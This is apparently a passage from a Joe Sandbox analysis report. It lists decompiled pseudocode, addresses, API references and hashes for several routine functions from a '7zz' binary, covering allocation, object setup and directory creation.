                                                                      • Instruction Fuzzy Hash: 2B11C4719002049ACB24EF59C4519EEBBB4EF55368F10823EE866A73C2C7389B05CB9C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406D26 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 54%
                                                                      			E00406D26(signed int* __ecx) {
				signed int _t17;
				signed int* _t18;
				signed int* _t22;
				signed int _t31;
				signed int* _t34;
				void* _t36;

				E0046B890(E00473641, _t36);
				_push(__ecx);
				_t34 = __ecx;
				 *__ecx =  *(_t36 + 8);
				_t22 = 0;
				_t17 = 4;
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				__ecx[3] = 0;
				__ecx[4] = 0;
				__ecx[5] = 0;
				__ecx[6] = _t17;
				__ecx[2] = 0x47a420;
				_t31 =  *__ecx;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				_push(_t31 * 0x1c + _t17); // executed
				_t18 = E004079F2(); // executed
				 *(_t36 + 8) = _t18;
				 *((char*)(_t36 - 4)) = 1;
				if(_t18 != 0) {
					_push(E00406E0B);
					_t11 =  &(_t18[1]); // 0x4
					_t22 = _t11;
					 *_t18 = _t31;
					L0046BDE5(_t22, 0x1c, _t31, E00406DA2);
				}
				 *(_t34 + 4) = _t22;
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}









                                                                      0x00406d2b
                                                                      0x00406d30
                                                                      0x00406d36
                                                                      0x00406d3b
                                                                      0x00406d3d
                                                                      0x00406d3f
                                                                      0x00406d40
                                                                      0x00406d43
                                                                      0x00406d46
                                                                      0x00406d49
                                                                      0x00406d4c
                                                                      0x00406d4f
                                                                      0x00406d56
                                                                      0x00406d58
                                                                      0x00406d62
                                                                      0x00406d63
                                                                      0x00406d69
                                                                      0x00406d6e
                                                                      0x00406d72
                                                                      0x00406d74
                                                                      0x00406d7e
                                                                      0x00406d7e
                                                                      0x00406d85
                                                                      0x00406d87
                                                                      0x00406d87
                                                                      0x00406d8f
                                                                      0x00406d97
                                                                      0x00406d9f

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: 59@
                                                                      • API String ID: 3519838083-2780377667
                                                                      • Opcode ID: ccaf45141dc2e5dfeafb79c2efc15b9fdd1926c8c86a780438c4f9b1b500aaa8
                                                                      • Instruction ID: 8e0203aed7f2cdd9f9826150055b001f54c225d166ae57bfc4d77955059de4c0
                                                                      • Opcode Fuzzy Hash: ccaf45141dc2e5dfeafb79c2efc15b9fdd1926c8c86a780438c4f9b1b500aaa8
                                                                      • Instruction Fuzzy Hash: E30152B1A00304AFD724DF5ED885A9AFBF4FB48704B50893FE14AD7781D3749A448B94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418A23 Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 80%
                                                                      			E00418A23(intOrPtr __ecx) {
				intOrPtr _t105;
				intOrPtr _t113;
				void* _t115;
				intOrPtr _t118;
				long _t123;
				intOrPtr* _t131;
				void* _t137;
				void* _t141;
				intOrPtr* _t151;
				signed int _t157;
				intOrPtr _t192;
				intOrPtr* _t196;
				long _t198;
				void* _t199;

				E0046B890(E00474EAE, _t199);
				_t192 = __ecx;
				_t157 = 0;
				_push(0x90);
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_t105 = E004079F2();
				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
				 *(_t199 - 4) = 0;
				if(_t105 == 0) {
					_t196 = 0;
					__eflags = 0;
				} else {
					_t196 = E00418C9D(_t105);
				}
				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
				if(_t196 != _t157) {
					 *((intOrPtr*)( *_t196 + 4))(_t196);
				}
				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
				 *(_t199 - 4) = 1;
				 *(_t199 - 0x3c) = _t157;
				 *(_t199 - 0x38) = _t157;
				 *(_t199 - 0x34) = _t157;
				E00401E9A(_t199 - 0x3c, 3);
				 *(_t199 - 4) = 2;
				 *(_t199 - 0x24) = _t157;
				 *(_t199 - 0x20) = _t157;
				 *(_t199 - 0x1c) = _t157;
				E00401E9A(_t199 - 0x24, 3);
				 *(_t199 - 4) = 3;
				 *(_t199 - 0x30) = _t157;
				 *(_t199 - 0x2c) = _t157;
				 *(_t199 - 0x28) = _t157;
				E00401E9A(_t199 - 0x30, 3);
				 *(_t199 - 4) = 4;
				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
					_t58 = _t196 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
					goto L13;
				} else {
					if(E0040A28C( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c, _t199 + 0x1c) != 0) {
						_t137 = E00407399(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 5;
						E00401E26(_t199 - 0x24, _t137);
						 *(_t199 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t199 - 0x48)));
						_t141 = E004072C9(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 6;
						E00401E26(_t199 - 0x30, _t141);
						 *(_t199 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t199 - 0x48)));
						_push(_t199 - 0x30);
						_push(_t199 - 0x24);
						E00418E2D(_t196, __eflags); // executed
						L13:
						_push( *((intOrPtr*)(_t199 - 0x10)));
						_push( *((intOrPtr*)(_t199 + 0x18)));
						_push( *((intOrPtr*)(_t199 + 0x14)));
						_push( *((intOrPtr*)(_t199 + 0x10)));
						_push( *((intOrPtr*)(_t199 + 0xc)));
						_push( *((intOrPtr*)(_t199 + 8)));
						_t113 = E00418554(_t192); // executed
						__eflags = _t113 - _t157;
						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
						if(_t113 == _t157) {
							_push(_t199 - 0x30);
							_t115 = E0040B0A0(_t199 - 0x48, _t199 - 0x24);
							_t193 = _t192 + 0x14;
							_push(_t115);
							 *(_t199 - 4) = 7;
							E00406796(_t192 + 0x14);
							 *(_t199 - 4) = 4;
							E00407A18( *((intOrPtr*)(_t199 - 0x48)));
							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
								do {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
									_push(E0040B0A0(_t199 - 0x48, _t199 - 0x24));
									 *(_t199 - 4) = 8;
									E00406796(_t193);
									 *(_t199 - 4) = 4;
									E00407A18( *((intOrPtr*)(_t199 - 0x48)));
									_t157 = _t157 + 1;
									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
							}
							_t118 =  *((intOrPtr*)(_t199 - 0x14));
							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
							E00407A18( *(_t199 - 0x30));
							E00407A18( *(_t199 - 0x24));
							E00407A18( *(_t199 - 0x3c));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							E0043361B(_t199 - 0x10);
							_t123 = 0;
							__eflags = 0;
						} else {
							E00407A18( *(_t199 - 0x30));
							E00407A18( *(_t199 - 0x24));
							E00407A18( *(_t199 - 0x3c));
							_t131 =  *((intOrPtr*)(_t199 - 0x10));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							__eflags = _t131 - _t157;
							if(_t131 != _t157) {
								 *((intOrPtr*)( *_t131 + 8))(_t131);
							}
							_t123 =  *((intOrPtr*)(_t199 + 0x18));
						}
					} else {
						_t198 = GetLastError();
						E00407A18( *(_t199 - 0x30));
						E00407A18( *(_t199 - 0x24));
						E00407A18( *(_t199 - 0x3c));
						_t151 =  *((intOrPtr*)(_t199 - 0x10));
						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
						if(_t151 != _t157) {
							 *((intOrPtr*)( *_t151 + 8))(_t151);
						}
						_t123 = _t198;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
				return _t123;
			}

















                                                                      0x00418a28
                                                                      0x00418a33
                                                                      0x00418a35
                                                                      0x00418a37
                                                                      0x00418a3c
                                                                      0x00418a3f
                                                                      0x00418a42
                                                                      0x00418a45
                                                                      0x00418a4b
                                                                      0x00418a50
                                                                      0x00418a53
                                                                      0x00418a60
                                                                      0x00418a60
                                                                      0x00418a55
                                                                      0x00418a5c
                                                                      0x00418a5c
                                                                      0x00418a62
                                                                      0x00418a68
                                                                      0x00418a6b
                                                                      0x00418a70
                                                                      0x00418a70
                                                                      0x00418a78
                                                                      0x00418a7e
                                                                      0x00418a85
                                                                      0x00418a88
                                                                      0x00418a8b
                                                                      0x00418a8e
                                                                      0x00418a98
                                                                      0x00418a9c
                                                                      0x00418a9f
                                                                      0x00418aa2
                                                                      0x00418aa5
                                                                      0x00418aaf
                                                                      0x00418ab3
                                                                      0x00418ab6
                                                                      0x00418ab9
                                                                      0x00418abc
                                                                      0x00418ac4
                                                                      0x00418ac8
                                                                      0x00418b92
                                                                      0x00418b97
                                                                      0x00000000
                                                                      0x00418ad7
                                                                      0x00418aea
                                                                      0x00418b31
                                                                      0x00418b3a
                                                                      0x00418b3e
                                                                      0x00418b46
                                                                      0x00418b4a
                                                                      0x00418b5a
                                                                      0x00418b63
                                                                      0x00418b67
                                                                      0x00418b6f
                                                                      0x00418b73
                                                                      0x00418b7c
                                                                      0x00418b80
                                                                      0x00418b83
                                                                      0x00418b9a
                                                                      0x00418b9a
                                                                      0x00418b9f
                                                                      0x00418ba2
                                                                      0x00418ba5
                                                                      0x00418ba8
                                                                      0x00418bab
                                                                      0x00418bae
                                                                      0x00418bb3
                                                                      0x00418bb5
                                                                      0x00418bb8
                                                                      0x00418bf4
                                                                      0x00418bf8
                                                                      0x00418bfd
                                                                      0x00418c00
                                                                      0x00418c03
                                                                      0x00418c07
                                                                      0x00418c0f
                                                                      0x00418c13
                                                                      0x00418c18
                                                                      0x00418c1c
                                                                      0x00418c1e
                                                                      0x00418c27
                                                                      0x00418c2f
                                                                      0x00418c32
                                                                      0x00418c36
                                                                      0x00418c3e
                                                                      0x00418c42
                                                                      0x00418c47
                                                                      0x00418c49
                                                                      0x00418c49
                                                                      0x00418c1e
                                                                      0x00418c4e
                                                                      0x00418c5a
                                                                      0x00418c63
                                                                      0x00418c66
                                                                      0x00418c6e
                                                                      0x00418c76
                                                                      0x00418c7b
                                                                      0x00418c85
                                                                      0x00418c8a
                                                                      0x00418c8a
                                                                      0x00418bba
                                                                      0x00418bbd
                                                                      0x00418bc5
                                                                      0x00418bcd
                                                                      0x00418bd2
                                                                      0x00418bd5
                                                                      0x00418bdc
                                                                      0x00418bde
                                                                      0x00418be3
                                                                      0x00418be3
                                                                      0x00418be6
                                                                      0x00418be6
                                                                      0x00418aec
                                                                      0x00418af5
                                                                      0x00418af7
                                                                      0x00418aff
                                                                      0x00418b07
                                                                      0x00418b0c
                                                                      0x00418b0f
                                                                      0x00418b18
                                                                      0x00418b1d
                                                                      0x00418b1d
                                                                      0x00418b20
                                                                      0x00418b20
                                                                      0x00418aea
                                                                      0x00418c92
                                                                      0x00418c9a

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00418A28
                                                                      • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,00000000,00000000), ref: 00418AEC
                                                                        • Part of subcall function 00418C9D: __EH_prolog.LIBCMT ref: 00418CA2
                                                                        • Part of subcall function 00418E2D: __EH_prolog.LIBCMT ref: 00418E32
                                                                        • Part of subcall function 00418554: __EH_prolog.LIBCMT ref: 00418559
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2901101390-0
                                                                      • Opcode ID: c9f4e70e773d5ff2db6c1d574806bff589abc09b194824381731b90e3be6153d
                                                                      • Instruction ID: 21ff3a450d6b3ea728cd5a75b88ce90788197c2b0c5ee23b9bcb2e1d4e856eb5
                                                                      • Opcode Fuzzy Hash: c9f4e70e773d5ff2db6c1d574806bff589abc09b194824381731b90e3be6153d
                                                                      • Instruction Fuzzy Hash: 9F814771D04209EBCF01EFA5D881ADEBBB5BF08314F14456EF415B32A1DB39AA44CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00409D7C Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 99%
                                                                      			E00409D7C(void* __ecx) {
				signed int _t64;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed char _t75;
				long _t78;
				signed int _t80;
				signed char _t82;
				signed int _t87;
				intOrPtr* _t88;
				void* _t92;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t109;
				signed int _t116;
				intOrPtr _t123;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t132;
				signed int _t135;
				void* _t138;

				E0046B890(E00473AB8, _t138);
				E00403532(_t138 - 0x18, __ecx);
				_t109 =  *(_t138 - 0x14);
				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
				_t132 = 0x5c;
				if(_t109 == 0) {
					L13:
					E004039C0(_t138 - 0x24, _t138 - 0x18);
					_t135 =  *(_t138 - 0x14);
					 *(_t138 - 4) = 1;
					while(1) {
						L14:
						_t64 = E00409CCB( *((intOrPtr*)(_t138 - 0x18))); // executed
						__eflags = _t64;
						if(_t64 != 0) {
							break;
						}
						_t78 = GetLastError();
						__eflags = _t78 - 0xb7;
						if(_t78 == 0xb7) {
							E0040351A(_t138 - 0x40);
							 *(_t138 - 4) = 2;
							_t80 = E0040B431(_t138 - 0x68, _t128, __eflags,  *((intOrPtr*)(_t138 - 0x18))); // executed
							__eflags = _t80;
							if(_t80 != 0) {
								_t82 =  *(_t138 - 0x48) >> 4;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									 *(_t138 - 4) = 1;
									E00407A18( *((intOrPtr*)(_t138 - 0x40)));
									break;
								} else {
									_t102 = 0;
									__eflags = 0;
									goto L31;
								}
							} else {
								_t102 = 1;
								L31:
								E00407A18( *((intOrPtr*)(_t138 - 0x40)));
								E00407A18( *((intOrPtr*)(_t138 - 0x24)));
								E00407A18( *((intOrPtr*)(_t138 - 0x18)));
							}
						} else {
							_t87 =  *(_t138 - 0x14);
							__eflags = _t87;
							if(_t87 == 0) {
								L44:
								_t102 = 0;
								__eflags = 0;
								L45:
								E00407A18( *((intOrPtr*)(_t138 - 0x24)));
								_t129 =  *((intOrPtr*)(_t138 - 0x18));
								goto L46;
							} else {
								_t123 =  *((intOrPtr*)(_t138 - 0x18));
								_t88 = _t123 + _t87 * 2 - 2;
								while(1) {
									__eflags =  *_t88 - _t132;
									if( *_t88 == _t132) {
										break;
									}
									__eflags = _t88 - _t123;
									if(_t88 == _t123) {
										_t135 = _t135 | 0xffffffff;
										__eflags = _t135;
									} else {
										_t88 = _t88;
										continue;
									}
									L23:
									__eflags = _t135;
									if(__eflags < 0 || __eflags == 0) {
										goto L44;
									} else {
										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
											goto L44;
										} else {
											_t92 = E00407399(_t138 - 0x18, _t138 - 0x30, _t135);
											 *(_t138 - 4) = 3;
											E00401E26(_t138 - 0x18, _t92);
											 *(_t138 - 4) = 1;
											E00407A18( *((intOrPtr*)(_t138 - 0x30)));
											goto L14;
										}
									}
									goto L47;
								}
								_t135 = _t88 - _t123 >> 1;
								goto L23;
							}
						}
						goto L47;
					}
					E00401E26(_t138 - 0x18, _t138 - 0x24);
					while(1) {
						L34:
						__eflags = _t135 -  *(_t138 - 0x14);
						if(_t135 >=  *(_t138 - 0x14)) {
							break;
						}
						_t130 =  *((intOrPtr*)(_t138 - 0x18));
						_t70 = _t130 + 2 + _t135 * 2;
						while(1) {
							_t116 =  *_t70;
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								break;
							}
							__eflags = _t116;
							if(_t116 == 0) {
								_t135 = _t135 | 0xffffffff;
								__eflags = _t135;
							} else {
								_t70 = _t70 + 2;
								continue;
							}
							L41:
							__eflags = _t135;
							if(_t135 < 0) {
								_t135 =  *(_t138 - 0x14);
							}
							_t74 = E00407399(_t138 - 0x18, _t138 - 0x30, _t135);
							 *(_t138 - 4) = 4;
							_t75 = E00409CCB( *_t74);
							 *(_t138 - 4) = 1;
							asm("sbb bl, bl");
							E00407A18( *((intOrPtr*)(_t138 - 0x30)));
							__eflags =  ~_t75 + 1;
							if( ~_t75 + 1 == 0) {
								goto L34;
							} else {
								goto L44;
							}
							goto L45;
						}
						_t135 = _t70 - _t130 >> 1;
						goto L41;
					}
					_t102 = 1;
					goto L45;
				} else {
					_t128 =  *((intOrPtr*)(_t138 - 0x18));
					_t96 = _t128 + _t109 * 2 - 2;
					while( *_t96 != _t132) {
						if(_t96 == _t128) {
							_t98 = _t96 | 0xffffffff;
							__eflags = _t98;
						} else {
							_t96 = _t96;
							continue;
						}
						L7:
						__eflags = _t98;
						if(_t98 <= 0) {
							goto L13;
						} else {
							__eflags = _t98 - _t109 - 1;
							if(_t98 != _t109 - 1) {
								goto L13;
							} else {
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									L12:
									E004075A5(_t138 - 0x18, _t98, 1);
									goto L13;
								} else {
									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
									if( *((short*)(_t128 + 2)) != 0x3a) {
										goto L12;
									} else {
										_t102 = 1;
										L46:
										E00407A18(_t129);
									}
								}
							}
						}
						goto L47;
					}
					_t98 = _t96 - _t128 >> 1;
					goto L7;
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
				return _t102;
			}

























                                                                      0x00409d81
                                                                      0x00409d90
                                                                      0x00409d95
                                                                      0x00409d98
                                                                      0x00409da0
                                                                      0x00409da1
                                                                      0x00409de9
                                                                      0x00409df0
                                                                      0x00409df5
                                                                      0x00409df8
                                                                      0x00409dfc
                                                                      0x00409dfc
                                                                      0x00409dff
                                                                      0x00409e04
                                                                      0x00409e06
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00409e0c
                                                                      0x00409e12
                                                                      0x00409e17
                                                                      0x00409e8c
                                                                      0x00409e97
                                                                      0x00409e9b
                                                                      0x00409ea0
                                                                      0x00409ea2
                                                                      0x00409eab
                                                                      0x00409eae
                                                                      0x00409eb0
                                                                      0x00409ed7
                                                                      0x00409edb
                                                                      0x00000000
                                                                      0x00409eb2
                                                                      0x00409eb2
                                                                      0x00409eb2
                                                                      0x00000000
                                                                      0x00409eb2
                                                                      0x00409ea4
                                                                      0x00409ea4
                                                                      0x00409eb4
                                                                      0x00409eb7
                                                                      0x00409ebf
                                                                      0x00409ec7
                                                                      0x00409ecc
                                                                      0x00409e19
                                                                      0x00409e19
                                                                      0x00409e1c
                                                                      0x00409e1e
                                                                      0x00409f51
                                                                      0x00409f51
                                                                      0x00409f51
                                                                      0x00409f53
                                                                      0x00409f56
                                                                      0x00409f5b
                                                                      0x00000000
                                                                      0x00409e24
                                                                      0x00409e24
                                                                      0x00409e27
                                                                      0x00409e2b
                                                                      0x00409e2b
                                                                      0x00409e2e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00409e30
                                                                      0x00409e32
                                                                      0x00409e40
                                                                      0x00409e40
                                                                      0x00409e34
                                                                      0x00409e35
                                                                      0x00000000
                                                                      0x00409e35
                                                                      0x00409e43
                                                                      0x00409e43
                                                                      0x00409e45
                                                                      0x00000000
                                                                      0x00409e51
                                                                      0x00409e51
                                                                      0x00409e57
                                                                      0x00000000
                                                                      0x00409e5d
                                                                      0x00409e65
                                                                      0x00409e6e
                                                                      0x00409e72
                                                                      0x00409e77
                                                                      0x00409e7e
                                                                      0x00000000
                                                                      0x00409e83
                                                                      0x00409e57
                                                                      0x00000000
                                                                      0x00409e45
                                                                      0x00409e3c
                                                                      0x00000000
                                                                      0x00409e3c
                                                                      0x00409e1e
                                                                      0x00000000
                                                                      0x00409e17
                                                                      0x00409ee8
                                                                      0x00409eed
                                                                      0x00409eed
                                                                      0x00409eed
                                                                      0x00409ef0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00409ef6
                                                                      0x00409ef9
                                                                      0x00409efd
                                                                      0x00409efd
                                                                      0x00409f00
                                                                      0x00409f03
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00409f05
                                                                      0x00409f08
                                                                      0x00409f16
                                                                      0x00409f16
                                                                      0x00409f0a
                                                                      0x00409f0b
                                                                      0x00000000
                                                                      0x00409f0b
                                                                      0x00409f19
                                                                      0x00409f19
                                                                      0x00409f1b
                                                                      0x00409f1d
                                                                      0x00409f1d
                                                                      0x00409f28
                                                                      0x00409f2f
                                                                      0x00409f33
                                                                      0x00409f3a
                                                                      0x00409f43
                                                                      0x00409f47
                                                                      0x00409f4c
                                                                      0x00409f4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00409f4f
                                                                      0x00409f12
                                                                      0x00000000
                                                                      0x00409f12
                                                                      0x00409f77
                                                                      0x00000000
                                                                      0x00409da3
                                                                      0x00409da3
                                                                      0x00409da6
                                                                      0x00409daa
                                                                      0x00409db1
                                                                      0x00409dbd
                                                                      0x00409dbd
                                                                      0x00409db3
                                                                      0x00409db4
                                                                      0x00000000
                                                                      0x00409db4
                                                                      0x00409dc0
                                                                      0x00409dc0
                                                                      0x00409dc2
                                                                      0x00000000
                                                                      0x00409dc4
                                                                      0x00409dc7
                                                                      0x00409dc9
                                                                      0x00000000
                                                                      0x00409dcb
                                                                      0x00409dcb
                                                                      0x00409dce
                                                                      0x00409dde
                                                                      0x00409de4
                                                                      0x00000000
                                                                      0x00409dd0
                                                                      0x00409dd0
                                                                      0x00409dd5
                                                                      0x00000000
                                                                      0x00409dd7
                                                                      0x00409dd7
                                                                      0x00409f5f
                                                                      0x00409f60
                                                                      0x00409f65
                                                                      0x00409dd5
                                                                      0x00409dce
                                                                      0x00409dc9
                                                                      0x00000000
                                                                      0x00409dc2
                                                                      0x00409db9
                                                                      0x00000000
                                                                      0x00409db9
                                                                      0x00409f66
                                                                      0x00409f6e
                                                                      0x00409f76

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00409D81
                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00409E0C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorH_prologLast
                                                                      • String ID:
                                                                      • API String ID: 1057991267-0
                                                                      • Opcode ID: 27410a41fbf9886fd801f2971488f14059beac07e3496cbe200165a808850a0c
                                                                      • Instruction ID: a50931f9f0b53e642fd9c4839daf4fd4c57a1ea79cde473ef903889cc23e4543
                                                                      • Opcode Fuzzy Hash: 27410a41fbf9886fd801f2971488f14059beac07e3496cbe200165a808850a0c
                                                                      • Instruction Fuzzy Hash: DE51DF31D4410ADADF10EBA1C942AEEBB74AF51318F14017BE801B72D2D739AE46C7D9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004183FD Relevance: 3.1, APIs: 2, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 52%
                                                                      			E004183FD(intOrPtr __ecx) {
				long _t31;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr* _t42;
				intOrPtr _t53;
				intOrPtr _t59;
				long _t62;
				void* _t64;
				void* _t65;

				E0046B890(E00474DEA, _t65);
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				 *((intOrPtr*)(_t65 - 0x14)) = 0;
				 *(_t65 - 4) = 0;
				 *((intOrPtr*)(_t65 - 0x10)) = 0;
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
						goto L12;
					} else {
						_push(0x40);
						_t53 = E004079F2();
						 *((intOrPtr*)(_t65 + 0x10)) = _t53;
						 *(_t65 - 4) = 2;
						if(_t53 == 0) {
							_t64 = 0;
						} else {
							_t64 = E0040CF63(_t53);
						}
						 *(_t65 - 4) = 1;
						E0040C9B4(_t65 - 0x14, _t64);
						if(E0040CF41(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
							goto L12;
						} else {
							_t31 = GetLastError();
						}
					}
				} else {
					_push(8);
					_t42 = E004079F2();
					if(_t42 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t42 + 4)) = 0;
						 *_t42 = 0x47ab90;
					}
					E0040C9B4(_t65 - 0x10, _t42);
					L12:
					_t31 = E00417BAE(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
				}
				_t62 = _t31;
				_t32 =  *((intOrPtr*)(_t65 - 0x10));
				 *(_t65 - 4) = 0;
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 8))(_t32);
				}
				_t33 =  *((intOrPtr*)(_t65 - 0x14));
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if(_t33 != 0) {
					 *((intOrPtr*)( *_t33 + 8))(_t33);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t62;
